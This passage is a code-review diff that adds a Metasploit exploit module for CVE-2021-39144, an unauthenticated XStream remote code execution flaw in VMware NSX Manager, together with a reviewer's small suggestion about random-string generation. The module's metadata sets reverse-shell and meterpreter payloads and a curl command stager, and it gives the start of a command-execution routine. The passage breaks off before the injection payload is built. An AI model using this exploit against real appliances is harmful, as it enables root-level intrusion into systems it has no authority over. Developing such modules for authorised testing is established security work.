modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb

```diff
@@ -0,0 +1,143 @@
+          Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
+          a malicious actor can get remote code execution in the context of 'root' on the appliance.
+          VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13
+          are vulnerable to Remote Command Injection.
+
+          This module exploits the vulnerability to upload and execute payloads gaining root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y', # metasploit module author
+          'Sina Kheirkhah, Source Incite', # Security researcher
+          'Steven Seeley,  Source Incite' # Security researcher
+        ],
+        'References' => [
+          ['CVE', '2021-39144'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0027.html'],
+          ['URL', 'https://kb.vmware.com/s/article/89809'],
+          ['URL', 'https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html'],
+          ['URL', 'https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144']
+        ],
+        'DisclosureDate' => '2022-10-25',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :in_memory,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'printf' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def check_nsx_v_mgr
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.jsp')
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    print_error("Communication error occurred: #{e.message}")
+    return nil
+  end
+
+  def execute_command(cmd, _opts = {})
+    b64 = Rex::Text.encode_base64(cmd)
+    random_uri = SecureRandom.alphanumeric(rand(4..10))
```

Comment:
This doesn't really need to be using `SecureRandom`.
```suggestion
    random_uri = rand_text_alphanumeric(4..10)
```